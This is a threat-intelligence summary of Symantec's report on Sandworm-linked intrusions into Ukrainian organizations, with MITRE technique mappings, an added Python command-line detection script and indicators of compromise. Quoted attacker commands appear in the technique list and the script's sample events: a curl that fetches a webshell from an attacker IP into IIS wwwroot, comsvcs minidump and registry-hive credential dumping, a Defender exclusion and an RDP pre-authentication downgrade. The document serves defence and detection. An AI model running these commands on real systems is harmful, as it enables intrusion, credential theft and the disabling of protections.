A Russian-linked actor deployed Localolive webshells and extensive Living-off-the-Land and dual-use tooling to conduct prolonged intrusions against Ukrainian organizations, focusing on credential harvesting and persistent access. Symantec recovered multiple file hashes and network indicators tied to webshells, PowerShell backdoors, and suspicious executables. #Localolive #Sandworm
Keypoints
- Attackers deployed Localolive and other webshells on public-facing servers, likely via unpatched vulnerabilities to gain initial access.
- Adversaries relied heavily on Living-off-the-Land and dual-use tools, minimizing bespoke malware usage while using commands, scheduled tasks, and native Windows utilities to collect data.
- Reconnaissance and credential-harvesting techniques included systeminfo, tasklist, reg save, memory dumps (rundll32 comsvcs.dll minidump, rdrleakdiag), and queries for KeePass processes.
- Multiple scheduled tasks were created to perform periodic memory dumps and to run PowerShell backdoors (e.g., link.ps1) every 30 minutes to maintain persistence.
- Attackers installed and configured OpenSSH and firewall rules to enable remote access, and modified RDP-related registry keys to permit unauthenticated connections.
- Symantec identified numerous file indicators (webshells, unknown executables, PowerShell backdoors) and network indicators tied to attacker infrastructure, and provided hashes for detection.
- Activity spanned at least June 27–August 20, 2025, affecting a large business services organization and a local government organization in Ukraine, consistent with Russian-origin threat activity linked to Sandworm.
MITRE Techniques
- [T1505] Server Software Component – Webshells (Localolive) were deployed on public-facing servers, providing initial access: “cmd.exe /c curl 185.145.245.209:22065/service.aspx > C:\inetpub\wwwroot\aspnet_client\service.aspx”.
- [T1204] User Execution – Attackers ran downloaded executables and scripts from the Downloads folder (e.g., service.exe, cloud.exe, dotnet-install.ps1): “CSIDL_PROFILE\downloads\service.exe”.
- [T1059] Command and Scripting Interpreter – Use of cmd.exe, PowerShell, and Python scripts to execute reconnaissance, configure Defender exclusions, and run backdoors: “powershell Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloads”.
- [T1053] Scheduled Task/Job – Creation of scheduled tasks to run every 30 minutes for memory dumping and backdoor execution: “schtasks /create /sc minute /mo 30 /tn asd /ru system /rl highest /f /tr …minidump…”.
- [T1003] OS Credential Dumping – Memory dumps and registry hive saves were performed to extract credentials: “reg.exe save hklm\system CSIDL_PROFILE\1.log” and rundll32 comsvcs.dll minidump commands.
- [T1016] System Network Configuration Discovery – Network reconnaissance commands like arp and tracert were executed to map network connectivity: “CSIDL_SYSTEM\cmd.exe /C arp -a” and “tracert 8.8.8.8”.
- [T1018] Remote System Discovery – Active Directory and domain enumeration were performed (Get-AdComputer; net group /domain): “powershell Get-AdComputer -filter *” and “CSIDL_SYSTEM\cmd.exe /C net group /domain [REMOVED]”.
- [T1112] Modify Registry – Registry keys were modified to permit RDP connections without pre-authentication: ‘reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp” /v SecurityLayer /t Reg_DWORD /d 0 /f’.
- [T1486] Data Encrypted for Impact (partial) – While destructive encryption was not observed here, the attributed group (Sandworm) is known for disruptive operations; the report notes the group’s destructive history: “…history of specializing in destructive attacks…”.
- [T1105] Ingress Tool Transfer – Downloading tools and webshells from attacker-controlled infrastructure to compromised hosts: “curl 185.145.245.209:22065/service.aspx”.
- [T1490] Inhibit System Recovery – Disabling or excluding Windows Defender scanning for Downloads to reduce detection risk: “powershell Add-MpPreference -ExclusionPath CSIDL_PROFILE\downloads”.
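As an added example (not Symantec's code or part of the report), the following Python triage script matches process-creation command lines against the Living-off-the-Land patterns listed in the Keypoints and MITRE Techniques sections above. The sample events are constructed from the quoted commands; the target PID and dump path in the schtasks sample are placeholders, since the report elides them.

```python
import re

# Detection rules keyed by the MITRE technique IDs cited in the report.
# Each rule is a case-insensitive regex applied to a process command line.
RULES = {
    "T1003 comsvcs MiniDump / rdrleakdiag memory dump":
        re.compile(r"comsvcs\.dll.*minidump|rdrleakdiag", re.I),
    "T1003 registry hive save":
        re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(system|sam|security)", re.I),
    "T1053 scheduled task with minute-level recurrence":
        re.compile(r"schtasks\s+/create.*?/sc\s+minute.*?/mo\s+\d+", re.I),
    "T1059 Defender exclusion added via Add-MpPreference":
        re.compile(r"add-mppreference\s+-exclusionpath", re.I),
    "T1112 RDP SecurityLayer set to 0":
        re.compile(r"reg\s+add\s+.*rdp-tcp.*securitylayer.*?/d\s+0", re.I),
    "T1105 curl writing into IIS wwwroot":
        re.compile(r"\bcurl\b.*>\s*\S*inetpub\\wwwroot", re.I),
}

def classify(cmdline):
    """Return the names of every rule the command line matches."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]

def scan_events(events):
    """events: iterable of (host, cmdline). Returns (host, cmdline, hits) for matches only."""
    findings = []
    for host, cmdline in events:
        hits = classify(cmdline)
        if hits:
            findings.append((host, cmdline, hits))
    return findings

# Constructed sample events modelled on the report's quoted commands (not real telemetry).
# PID 624 and the .dmp path in the schtasks line are placeholders, not values from the report.
SAMPLE_EVENTS = [
    ("web01", r'cmd.exe /c curl 185.145.245.209:22065/service.aspx > C:\inetpub\wwwroot\aspnet_client\service.aspx'),
    ("web01", r'powershell Add-MpPreference -ExclusionPath C:\Users\svc\downloads'),
    ("dc01",  r'schtasks /create /sc minute /mo 30 /tn asd /ru system /rl highest /f /tr "rundll32 comsvcs.dll MiniDump 624 C:\Windows\Temp\svc.dmp full"'),
    ("dc01",  r'reg.exe save hklm\system C:\Users\svc\1.log'),
    ("dc01",  r'reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t Reg_DWORD /d 0 /f'),
    ("ws07",  r'C:\Windows\system32\cmd.exe /C tasklist'),  # benign-looking recon, not flagged here
]

if __name__ == "__main__":
    for host, cmdline, hits in scan_events(SAMPLE_EVENTS):
        print(f"[{host}] {', '.join(hits)}\n    {cmdline}")
```

Feed it command lines from Sysmon Event ID 1 or Security Event ID 4688 with command-line auditing enabled; the plain tasklist event is left unflagged on purpose because discovery commands alone are too noisy without the surrounding context.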
Indicators of Compromise
- [File hash] Webshell and backdoor detections – 636e04f0618dd578d107f440b1cf6c910502d160130adae5e415b2dd2b36abcb (Localolive), 70a5492db39585ec18de512058a5389c9a4043fba13ca8ad7d057ead66298626 (webshell)
- [File hash] Suspicious executables – 8c07c37ac84d4c6fd76de3d966e26b65e401bc641a845baf6f73ad0d6a10fc6b (service.exe), 44b1f3f06607cd3ee16517d31b30208910ce678cb69ba7a0514546dff183dfce (cloud.exe)
- [File hash] PowerShell backdoors – cf8e09f013fcb5f34c8c274bf07d9047956ba441dabf2d3de87ea025e14058b7 (link.ps1), e03b8c54ac916b363f956e4e4e04a19eb4119455d8006c92e9328e16a8cee52f (torrent_cache.ps1)
- [File name] Legitimate tool placed by attackers – winbox64.exe (MikroTik router management app) – listed as deployed in Downloads and appearing in CERT-UA Sandworm reporting.
- [Network IP / Domain] Infrastructure – 185.145.245[.]209 (used to serve service.aspx), ciscoheartbeat[.]com (attacker-associated domain)
Read more: https://www.security.com/threat-intelligence/ukraine-russia-attacks